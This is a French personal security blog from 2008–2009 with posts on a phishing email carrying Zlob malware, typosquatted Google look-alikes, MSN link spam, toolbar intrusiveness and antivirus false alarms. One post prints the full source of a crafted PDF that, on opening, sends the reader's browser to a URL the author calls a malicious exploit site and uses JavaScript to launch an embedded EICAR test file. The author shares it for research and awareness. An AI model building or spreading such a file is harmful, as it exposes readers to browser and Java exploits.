Dimanche 28 juin 2009
Ancien adapte de Winamp (surtout 2.x), j'ai quelque peu laissé ce lecteur multimédia aux oubliettes avec l'arrivée des versions 3, puis très rapidement 5, notamment pour des problèmes de performances (et aussi de sécurité).

Récemment, travaillant sur la problématique d'offre de lecteur multimédia sur poste de travail, sécurisé, Winamp est revenu sur la table.

Qu'à cela ne tienne, j'ai donc couru installer la bête sur ma machine personnelle.

Passons brièvement sur l'installation, longue et surtout peu claire pour un néophyte puisqu'il est proposé :
- un téléchargement de MP3 (gratuits ?)
- l'installation d'un serveur multimédia pour rediriger la lecture de la bibliothèque sur un mobile, ou tout autre PC
- des barres d'outils...

Comme indiqué plus haut, j'avais abandonné Winamp pour des raisons de consommation excessive de ressources.
Je crains que cela ne soit encore le cas, et voici pourquoi.

Constatant des accès disques nombreux, un Firefox ultra-gourmand en mémoire (déjà qu'en temps normal, ce n'est pas la gloire...), j'ai donc lancé l'outil SysInternals ProcMon.
Le résultat est assez éloquent :



On se rend tout de suite compte que Firefox lance de nombreuses requêtes vers le registre, plus particulièrement sur les clés associées à la barre d'outils de Winamp 5 !

Ne comprenant pas la justification d'une telle activité système pour la barre d'outil, et n'ayant pas trouvé de moyen de régler ce problème dans les paramétrages, j'ai donc supprimé cette fameuse barre...
Et je n'ai même pas regardé les flux réseaux... !

Au passage, signalons tout de même que la barre d'outil change de nombreux réglages du navigateur, notamment les pages de recherche, les "accélérateurs", les pages s'affichant lorsque l'on fait une faute de frappe sur une URL, etc...
Bref, j'appelle ça de l'intrusif !!!

Je préfère de loin AIMP et VLC, que je recommande à ceux qui ne les ont pas déjà.


A bon entendeur....  
Par Philippe V. - Publié dans : Bidouille informatique
Ecrire un commentaire - Voir les 1 commentaires - Recommander
Mardi 23 juin 2009
Quand on est veilleur, on se doit de surveiller même les offres "grand public", car c'est justement elles qui pourraient tenter l'utilisateur, bien qu'il soit dans un contexte professionnel...

Cette fois-ci, j'ai donc jeté un nouveau coup d'oeil au Google Pack.

Quelques changements ont eu lieu dans le choix des logiciels faisant "partie" du "pack Google", bref.

J'ai donc téléchargé (presque) la totale, mais je n'ai pas osé l'outil Norton de peur d'un réel conflit avec mon AV déjà installé, et aussi suite à de nombreuses mauvaises expériences de problèmes sans fin pour la désinstallation des produits Norton...

Revenons à nos moutons, je lance le système Google Pack. L'intertace s'ouvre, on apprécie le mode tout automatique.

Un certain "spyware doctor" (de PC-Tools) va s'installer. De quoi challenger mon ESET.

Hé bien surprise, durant l'installation, ESET a du avoir tellement peur qu'il a lui-même bloqué le pilote déployé par Spyware Doctor... et m'annonce un "PCAgent".

Le pire, c'est que l'installation s'est soit-disant bien passée...  Preuve que le système de contrôle d'intégrité après installation de PC Tools n'est peut être pas si au point que ça...

Presque inquiétant, le résultat complètement incohérent des scans antiviraux multimoteur sur : www.virustotal.com :
http://www.virustotal.com/fr/analisis/ea25afa088e47cb1bfa985f110927e88326f75b060d0c58405c211d5416b4dff-1245710329

Spyware Doctor est-il :
- un voleur d'identifiants bancaires ? (Win32.Banker)
- un élément de Win32/Monitor.PCAgent ?
- une variante (encore une !) de Trojan/Agent ?
- ou encore mieux : un "Unclassified Malware" ?  (c'est quoi donc ? )

J'avoue ne pas m'y retrouver moi-même.


Question finale :
Mais comment voulez-vous qu'un utilisateur lambda s'y retrouve si son antivirus sonne l'alarme quand il est en train d'installer un logiciel "made in google"...?

Parce que c'est bien connu : tout ce qui vient de Google est à la mode, sécurisé, et indispensable...
Non ? pourtant c'est ce qu'on entend souvent...



================ Eng summary ===================

After I had installed the Google Pack, my ESET AV warned me about a sys file being copied to System32, during the installation of Spyware Doctor (component of the Google Pack...).
You can see it on the screenshot above.
My question is: how a lambda user could make the difference between that kind of security alarm, and a real one?
What or who should he trust:: Google Inc or ESET?
Sometimes I don't understand AV policy detection choices!
Par Philippe V. - Publié dans : Veille sécurité
Ecrire un commentaire - Voir les 0 commentaires - Recommander
Lundi 1 juin 2009
Une fois n'est pas coutume, je vais jouer l'internaute lambda :)

On m'a parlé du site http://www.geoscopie.com/  qui soit-disant est bien classé au niveau Intelligence Économique.

En allant dessus, j'ai eu quelques difficultés à comprendre de quoi il était question, et pour cause : je ne suis pas bilingue en japonais...!

Voici une pseudo-traduction (merci aux gens de Mountain View) :
http://translate.google.com/translate?prev=hp&hl=fr&js=n&u=http%3A%2F%2Fwww.geoscopie.com&sl=ja&tl=fr&history_state0=

Et le plus fort, c'est que même avec la traduction, j'ai du mal à voir le rapport.
Entre l'achat de maison en bois, les caméras de sécurité, la robe de mariée, etc... j'avoue y perdre le fil.

Et pire, quand on regarde le WhoIs de ce domaine : http://www.domaincrawler.com/domains/view/http://www.geoscopie.com/ :
- le "networksolutionsprivateregistration.com" en technical contact ne saute pas aux yeux mais presque...
- les serveurs NS "WEBSITEWELCOME.COM"  classés rouge par Netcraft... (lien pour info)

Alors vengeance ? je le croirais presque...

Moralité :ne jamais considérer que parce qu'une URL est à priori connue, on peut l'ouvrir dans son navigateur sans crainte : l'antivirus + filtrage sur URL sont indispensables !


PS : le VRAI site, lui, est toujours là, mais l'URL est : geoscopies.net   ....
Par Philippe V. - Publié dans : Veille sécurité
Ecrire un commentaire - Voir les 0 commentaires - Recommander
Mercredi 13 mai 2009
Voici (encore) un petit exemple de ce qui pollue quotidiennement nos B.A.L... avec en prime une charge virale.
Il s'agit bien évidemment d'une contrefaçon d'une communication WesternUnion sur un transfert d'argent qui n'aurait pas abouti !

Commençons par ce qu'un utilisateur "standard" voit :
"Western Union Transfer MTCN: 3251452526"
On pourra noter que, bien qu'il soit rédigé en anglais ce qui va déjà exclure des victimes potentielles toute une population non anglophone, ce courriel est plutôt bien rédigé, sobre, sans faute qui saute aux yeux...

Bref, on dirait presque un vrai (malheureusement).
Les mauvaises langues diront que les traducteurs automatiques ont fait des progrès, peut être...


Puis, voici les entêtes de ce courriel :
(ce qu'un utilisateur non averti ne voit donc pas)


On se rend toute de suite compte que la vraie adresse émettrice n'est pas sur la zone DNS westernunion.fr (ou.com). C'est pourtant la vraie zone DNS pour le service de transfert d'argent international qu'est Western Union !

On pourrait donc parler d'une sorte d'usurpation d'identité, pourquoi pas.
Il s'agit en fait techniquement d'une utilisation détournée (et contraire aux bonnes pratiques) du champ "Data From", qui est en fait à valeur informative (et  dont le contenu est par conséquent arbitraire !).

En fait, la vraie adresse d'émission SMTP est la suivante : help@clickability.com

Cette adresse apparaît dans le champ "Envelope-From", que le MTA Exim a pris soin de conserver dans les entêtes du courriel. Ce champ est tronqué dans la capture que j'ai réalisé, car la ligne est trop longue :.
from [122.164.212.138] (helo=abts-tn-dynamic-138.212.164.122.airtelbroadband.in)    by smtp.%serveur%.%TLD% with esmtp (Exim 4.69)    (envelope-from <help@clickability.com>)    id 1M3qrQ-0005Ca-So; Tue, 12 May 2009 14:15:06 +0200


Petit rappel, ces 2 champs FROM sont spécifiés dans les RFC 2822 et 2821.
Seul le champ "Envelope From" est obligatoire dans la transaction SMTP permettant le transit du courriel entre serveurs SMTP.
Ce champ est fourni lorsque l'on initie une session SMTP, dont je vous donne un petit mémento basé sur une démo pratique : https://helpdesk.islandnet.com/pep/smtp.php


Revenons aux entêtes du courriel, afin d'un peu mieux cerner son transit.
Le serveur SMTP émetteur initial a pour adresse IP : 122.164.212.138
Une simple recherche Google montre immédiatement que cette adresse est en liste noire chez : Lashback.com (www.unsubscore.com/blacklist.txt)

En poussant un cran plus loin, sur dnsbl.info par exemple, on s'aperçoit que d'autres listes "DSNBL" signalent cette adresse Ip (voir http://www.dnsbl.info/dnsbl-database-check.php). Dans le lot, on reconnait SpamCop (qui n'est pas des moindres) et Barracuda.

Concernant le nom FQDN du serveur SMTP de départ, on le retrouve sur divers sites Internet, notamment ici : http://rss.uribl.com/reports/14d/dns_mx.html
Rank      dns_mx                                    Total          Not Listed        Black
#168    server500.appriver.com:10    19              14    73.7%        2 10.5%

Et là où cela devient tout de suite très concret, c'est qu'on se rend compte que ce serveur est utilisé en pointeur MX de la zone DNS scoot.co.uk !
Information confirmée ici : http://www.domaincrawler.com/domains/view/scoot.co.uk/

Mais ce n'est pas tout... s'agissant d'un pointeur vers une zone tierce, on pourrait supposer qu'il s'agit d'un service de messagerie (externalisée certainement...) utilisé aussi par d'autres sites Internet.
Et là bingo, merci Google (ou malheureusement, selon le point de vue) : une requête de ce type permet de trouver plus d'une centaine de domaines Internet dont l'un des pointeurs MX est le server500.appriver.com !
http://www.google.fr/search?q=site%3Adomaincrawler.com+server500.appriver.com&ie=utf-8&oe=utf-8&aq=t&rls=com.ubuntu:fr:unofficial&client=firefox-a

Il est certainement superflu de rappeler que les éléments détaillés dans cet article tendent à démontrer que ce service de messagerie appriver.com a été compromis au niveau sécurité !


Au sujet de la charge virale :

Le courriel contient une archive au format ZIP.
Voici une analyse virale multi-moteur du fichier EXE (nommé "MTCN_INVOICE.exe") que contient cette archive : lien sur jotti.org.
On a donc affaire à un Zlob ! qui n'est d'ailleurs pas nouveau dans le monde VX.

Dommage d'ailleurs pour Barracuda qui implémente normalement ClamScan comme couche antivirale, le test sur Jotti.org révèle que Clam ne voit rien pour cette variante de Zlob.


Bref, il ne fait pas forcément bon faire du business avec scoot.co.uk, ni passer par le service de messagerie de Appriver.com !
Par Philippe V. - Publié dans : Veille virale
Ecrire un commentaire - Voir les 1 commentaires - Recommander
Mardi 27 janvier 2009
Comme dit le dicton "ce sont les cordonniers qui sont souvent les plus mal chaussés"...
Et là, je trouve qu'on n'est pas loin !

Comme beaucoup dans le métier, je connais et utilise très souvent les outils SysInternals (au passage, chapeau bas pour la maîtrise technique des systèmes Windows, de leurs API et de leurs couches basses...).

Mais récemment, en voyant Process Explorer planter allègrement, j'ai commencé à me poser des questions.
Le fameux ProceXP ne voulait même plus être relancé, soit disant pour un problème d'allocation de ressources.

Voyons voir la config du poste:
- portable avec un T5500
- 4 Go de RAM
- disque SATA
- Process Explorer dernière version (fourni avec la dernière version de la suite SysInternals, en date du 15/01/09)
et ... aucune application graphique, jeu, ou autre glouton en ressources, de lancé !


Pourtant, j'ai régulièrement des avertissements du type :

N'y croyant pas réellement, je fais donc "annuler". Pourquoi Process Explorer pourrait-il occasionner une perte de données sur mon ordinateur, alors que je l'utilise justement pour surveiller ce qu'il se passe sur la machine, et ainsi... éviter tout ennui...

Et fatalement, on en vient à :(le comble !) :



Mais quand on regarde les ressources prises par Process Explorer, il se passe visiblement quelque chose (image en meilleure définition) :


Presque 550 Mo de mémoire système "virtuelle" ? C'est totalement anormal et aberrant !

Je crains donc qu'il s'agisse d'une fuite de mémoire sur l'outil Process Explorer (Microsoft ayant englouti SysInternals...), outil qui justement était connu pour déceler les fuites de mémoire...  c'est même indiqué sur leur site.

Affaire à suivre...
Je n'avais pas constaté tous ces plantages avec la version précédente de ProceXP...

Par Philippe V. - Publié dans : Veille sécurité
Ecrire un commentaire - Voir les 1 commentaires - Recommander
Mardi 16 décembre 2008
Comme indiqué dans le titre, et contrairement à ce semblent croire nombre d'internautes, un "faux moteur de recherche", ça existe...

Je prépare d'ailleurs un article à ce sujet, il sera publié sur une plateforme spéciale, et je mettrai certainement quelques éléments ici, en complément.

Je peux cependant déjà indiquer que le site signalé est une contrefaçon d'un des moteurs de recherche les plus connus au monde, puisqu'il indique le nom de ce fameux moteur en "arrière plan" de sa page d'accueil, et ce bien qu'il n'y soit pas affilié / autorisé.

Alerté sur le sujet, le fameux moteur de recherche (le vrai) va probablement lancer une procédure en justice, pour utilisation abusive de sa marque...

A suivre donc !
Par Philippe V. - Publié dans : Veille sécurité
Ecrire un commentaire - Voir les 1 commentaires - Recommander
Dimanche 23 novembre 2008

Cette fois-ci je n'étais même pas en mode "grandes oreilles" quand une fenêtre intempestive a surgit sur mon bureau.

 

Précisons, la configuration est un Vista SP1, avec KIS 2009 et Pidgin pour la messagerie instantannée.

 

Voici à quoi ressemblait la fenêtre publicitaire (lien )

 

 

Un contact en mode "hors ligne" qui m'envoie un lien... étrange... (comme on dirait en anglais "sounds familiar, doesn't it?").

 

Le site en question demandait des identifiants MSN et ... les mots de passe pour se connecter à une partie à accès restreint...

 

Or le lendemain de l'affaire (23/11/08), si l'on va sur le site en question, voici ce qui apparaît :

 

Tiens donc, ces chers amis de SearchPortal... !

 

Cependant on dirait qu'il y a bien anguille sous roche puisque le domaine hopto.org est référencé comme malveillant, par exemple ici : http://www.malwaredomains.com/files/domains.txt  et parfois depuis 2005 ! (raison indiquée : "botnet")...

 

 

Affaire à suivre, j'espère avoir des captures d'écran du fameux site diffusé via MSN.

 

 

Mise à jour du 29/11/08 (20h50) :

 

Nouvelle campagne de diffusion via MSN (autre contact que précédemment). . Cette fois-ci le site est : http://tinyurl.com/578kt2

 

Voici une capture du message (lien externe) :

 

 

 

En fait, cette URL diffusée sur MSN redirige de manière transparente sur un autre domaine : http://8685858.getenjoyment.net

Il s'agit d'un site porno !  

 

Je ne ferai pas de capture d'écran ;)


Il est drôle de noter le contenu hébergé sur leur sous-domaine "www" : http://www.getenjoyment.net/
Ecrit en bon français...  S'agit-il réellement du début d'une encyclopédie technique sur Internet...?

Le lendemain, ce site n'est déjà plus accessible...
- Google Chrome renvoie sur http://host.atwebpages.com/web_hosting_needs.html
- Firefox, via OpenDNS, renvoie sur une page d'erreur : http://guide.opendns.com/?url=8685858.getenjoyment.net


A quand la suivante...

 

Par Philippe V. - Publié dans : Veille virale
Ecrire un commentaire - Voir les 0 commentaires - Recommander
Jeudi 30 octobre 2008

Ha le problème de la faute de frappe...
Combien de collègues avons-nous entendu râler car ils venaient de faire une faute en tapant au clavier... (ex : "doigts carrés à la noix...").

Qu'est-ce que le typo-squatting, alias parasitage de nom de domaine Internet ?
C'est réserver un nom de domaine proche d'un nom connu (vous avez dit Google ?) mais avec une variante dans la syntaxe. Cette variance est censée correspondre à une faute de frappe que peut faire un utilisateur en allant visiter le site connu (www. google .fr).
Evidemment, si l'utilisateur fait réellement cette faute de frappe, et que le nom de domaine a été réservé, il n'y aura pas d'erreur affichée dans le navigateur... l'utilisateur sera envoyée sur une page de façon totalement arbitraire !
En un sens, on peut considérer que le typosquatting est proche du cyberquatting. Sauf que le cas du "typo" est que l'on vise indirectement une société, on ne réserve pas le nom de domaine correspondant exactement à la marque...
Ex de cybersquatting :
http://www.france2.com/, il y a 2 mois encore un site pornographique ! . Idem pour france3.com.
L'un des cas certainement les plus connus pourrait être "whitehouse.com", qui est resté pendant des années... un site porno.

Le fait de réserver un nom de domaine dont la syntaxe varie légèrement du domaine de la vraie cible, fait que ces enregitrements de noms de domaines parasites sont bien plus difficiles à détecter.


La surveillance de ce type de malveillance peut faire partie d'une activité de veilleur sécurité, mais je trouve que certains cas méritent d'être diffusés plus largement, pour information et sensibilisation.

Voici donc quelques exemples du genre, qui me semblent intéressants (je prends la cible type : Google) :

- googllle.com : fausse page de recherche, page "générique"... mais on note le "copyright googlle.com" en bas de page !

- qoogle.com : assez drôle, on est renvoyé vers ce qui semble être un vrai google, mais l'URL est : http://www.sohaibkhan.com/ ...  (encore un site à rajouter aux systèmes de filtrage Internet, pour certains...)

- http://qooqle.com/  : en voici un vrai, complet !!!  ce site affiche une interface utilisateur de type moteur de recherche, mais ce n'est pas Google !! Les résultats de recherche, comme "mp3" donnent des résultats totalement différents. Ce qui fait la force de cet exemple, c'est l'utilisation du "q" à la place du "g". Ceci, dans une mise en page où les liens Internet sont généralement soulignés, fait que l'utilisateur ne verra pas la différence entre les 2 lettres ! (idem pour l'exemple précédent).

- http://www.qoogle.fr/   qu'est-ce donc ? le jeu avec Google semble clair !  pourquoi le WhoIS est-il en mode anonyme ? http://www.whois.net/whois_new.cgi?d=qoogle&tld=fr


-----------

Même des sites parlant de sécurité se font viser !!


- http://www.avcomparative.org/   le fameux site de comparaison de solutions antivirales... il est plutôt drôle de constater que dans cette page, justement, on trouve des liens pour acheter des solutions comme Norton, AVAST, NOD32, PCTools...   comme on dit, l'argent n'a pas d'odeur... ?


- http://pagejaune.com   les PagesJaunes sont certainement l'un des sites les plus utilisés en France. Et là, je parle de dévu, un de mes proches a voulu aller sur le site des PagesJaunes, et a tapé cette adresse... évidemment ce fut un peu dur à expliquer, mais tellement réaliste !!



Ceci ne fait que démontrer à nouveau (s'il en était besoin) la nécessité d'avoir un filtrage Internet
- sur URL
- sur le contenu, incluant antivirus.
Il ne faut pas oublier que les utilisateurs ne feront pas forcément exprès d'aller sur des sites malveillants

Par Philippe V. - Publié dans : Veille sécurité
Ecrire un commentaire - Voir les 0 commentaires - Recommander
Vendredi 24 octobre 2008
De récentes investigations sur les nouveaux vecteurs viraux, m'ont amené à m'interroger et me documenter sur les problématiques liées aux fichiers PDF.

Depuis longtemps, pour ne pas dire depuis le début, ce format (PDF) a été considéré comme "sûr".
En fait, il garantissait surtout une impression conforme à la mise en forme originale du document, lors de sa création.


Je tiens donc à recommander les lectures suivantes concernant les PDF :
- le blog de Didier Stevens
- cet article évoquant la course actuelle au PDF "malveillant"


Fort de ces lectures et de mes propres recherches, je vous fournis le PDF suivant :
- embarque un EICAR, généré à la demande via un bouton dans le document.
- si ouvert sur une version 7 (7.0 par exemple), le PDF provoque l'ouverture du navigateur par défaut de la machine, et l'envoie sur un site russe malveillant (qui tente d'exploiter diverses failles sur le navigateur, voire sur la machine Java selon les cas).


Attention, ce PDF est réellement dangereux si vous ne prenez pas de précauions !
Je le livre à fins de recherche, de validations d'applications de correctifs (voire de réglages sécurité) sur Acrobat Reader, ainsi que dans un but démonstratif et de sensibilisation.
Je ne peux être tenu pour responsable des éventuels dommages que subirait votre système informatique si vous ne prenez pas les précautions nécessaires lors de l'utilisation de ce PDF.



----------------------------------------------------------------------------
%PDF-1.1

1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R
 /OpenAction 12 0 R
 /Names << /EmbeddedFiles << /Names [(EICAR.txt) 9 0 R] >> >>
>>
endobj

2 0 obj
<<
 /Type /Outlines
 /Count 0
>>
endobj

3 0 obj
<<
 /Type /Pages
 /Kids [4 0 R]
 /Count 1
>>
endobj

4 0 obj
<<
 /Type /Page
 /Parent 3 0 R
 /MediaBox [0 0 612 792]
 /Contents 5 0 R
 /Annots [7 0 R]
 /Resources <<
             /ProcSet [/PDF /Text]
             /Font << /F1 6 0 R >>
            >>
>>
endobj

5 0 obj
<< /Length 427 >>
stream
BT /F1 12 Tf 70 700 Td 15 TL
(CE PDF A l'AIR INNOCENT, POURTANT IL EMBARQUE 2 CHARGES VIRALES !) Tj
<58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A 58 35
34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 43 41
52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 49 56
49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 21 24
48 2B 48 2A> '
() '
(Il suffit de cliquer a l'interieur du rectangle pour lancer la generation de EICAR.) '
() '
(Click here) '
ET

endstream
endobj

6 0 obj
<<
 /Type /Font
 /Subtype /Type1
 /Name /F1
 /BaseFont /Helvetica
 /Encoding /MacRomanEncoding
>>
endobj

7 0 obj
<<
 /Type /Annot
 /Subtype /Link
 /Rect [65 620 130 640]
 /Border [16 16 1]
 /A 8 0 R
>>
endobj

8 0 obj
<<
 /Type /Action
 /S /JavaScript
 /JS (this.exportDataObject({ cName: "EICAR.txt", nLaunch: 2 });)
>>
endobj

9 0 obj
<<
 /Type /Filespec
 /F (EICAR.txt)
 /EF << /F 10 0 R >>
>>
endobj

10 0 obj
<<
 /Type /#45mbeddedFile
 /Length 208
 /Filter /ASCIIHexDecode
>>
stream
58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A 58 35
34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 43 41
52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 49 56
49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 21 24
48 2B 48 2A>
endstream
>>
endobj

12 0 obj
<<
 /Type /Action
 /S /URI
 /URI (http://hancockparkschool.org)
>>
endobj


xref
0 11
0000000000 65535 f
0000000012 00000 n
0000000152 00000 n
0000000208 00000 n
0000000277 00000 n
0000000500 00000 n
0000000986 00000 n
0000001110 00000 n
0000001225 00000 n
0000001352 00000 n
0000001436 00000 n
trailer
<<
 /Size 11
 /Root 1 0 R
>>
startxref
1763
%%EOF

-------------------------------------------------------------------------------------

Détection antivirale de cette page :

J'ai été informé que cette page (mon blog) était détectée par Avira Antivir :
http://original.avira.com/fr/threats/JS_Dldr_Agent_BJZ_details.html
Alors, non, il ne s'agit pas du PDF !
La raison est que j'ai laissé en clair des liens vers des serveurs malveillants (article précédent) notamment le faux "msn analytics". Antivir annonce un script, alors qu'il n'y en a pas dans la page ! (iframe désactivées par syntaxe volontairement erronnée)
Il semble donc qu'Antivir se base sur une simple détection d'URL dans du texte simple...
Par Philippe V.
Ecrire un commentaire - Voir les 0 commentaires - Recommander
Samedi 18 octobre 2008
L'opérateur serait-il victime de son succès ?

A l'heure où j'écris ces lignes, la recherche Google est inaccessible via l'accès 3G+ d'un mobile SFR.

On obtient le message suivant (depuis 23h environ) :

Your request could not be processed because an error occurred contacting the DNS server. The DNS server may be temporarily unavailable, or there could be a network problem.
For assistance, contact your network support team.

Un message plutot limpide pour l'utilisateur "lambda"...

Est-ce que SFR aurait un problème de DNS ? une migration qui se passe mal ?

Affaire à suivre. Mais il est fort à parier que "plus de google" ne passe pas aperçu dans un monde informatique où les internautes ne connaissent plus Internet sans Goooogle...


Par Philippe V. - Publié dans : Bidouille informatique
Ecrire un commentaire - Voir les 0 commentaires - Recommander
Créer un blog sur over-blog.com - Contact - C.G.U. - Rémunération en droits d'auteur - Signaler un abus